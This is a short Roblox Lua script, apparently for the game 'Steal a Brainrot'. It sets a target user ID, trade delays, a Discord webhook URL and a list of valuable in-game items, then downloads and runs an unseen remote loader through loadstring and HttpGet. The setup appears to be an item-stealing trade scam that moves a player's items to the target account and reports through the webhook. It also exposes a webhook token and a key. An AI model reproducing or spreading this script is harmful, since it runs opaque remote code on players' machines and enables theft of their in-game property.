getgenv().SECRET_KEY = "mrr_b4ecf85dd83d4c5d91f1c80c787eeb61"
getgenv().TARGET_ID = 10041177964
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1481301631491510393/nTxG0N1Y9CIx27JFaH73uiTLPlzbQPKqcTPLYgfZ6EwHMvJDWuIvba6zar4fXS_rl_D_"
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Griffin"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["La Taco Combinasion"] = true,
    ["La Romantic Grande"] = true,
    ["Swaggy Bros"] = true,
    ["Festive 67"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Swag Soda"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Spaghettis"] = true,
    ["Los Tacoritas"] = true,
    ["Ginger Gerat"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Spooky and Pumpky"] = true,
    ["La Casa Boo"] = true,
    ["Reinito Sleighito"] = true,
    ["Los Sekolahs"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Las Sis"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["La Ginger Sekolah"] = true,
    ["Rosetti Tualetti"] = true,
    ["Esok Sekolah"] = true,
    ["Spaghetti Tualetti"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Job Job Job Sahur"] = true,
    ["Perrito Burrito"] = true,
    ["Nacho Spyder"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Los Hotspotsitos"] = true,
    ["Love Love Bear"] = true,
    ["Celularcini Viciosini"] = true,
    ["Cuadramat and Pakrahmatmamat"] = true,
    ["Los Sweethearts"] = true,
    ["Los Mobilis"] = true,
    ["Los Candies"] = true,
    ["Pumpkini Spyderini"] = true,
    ["Love Love Love Sahur"] = true,
    ["Donkeyturbo Express"] = true,
    ["Fishino Clownino"] = true,
    ["Horegini Boom"] = true,
    ["Los Amigos"] = true,
    ["Sammyni Fattini"] = true,
    ["Lovin Rose"] = true,
    ["Pot Pumpkin"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Planitos"] = true,
    ["Money Money Reindeer"] = true,
    ["Brunito Marsito"] = true,
    ["Guest 666"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["La Spooky Grande"] = true,
    ["La Extinct Grande"] = true,
    ["Tacorita Bicicleta"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()
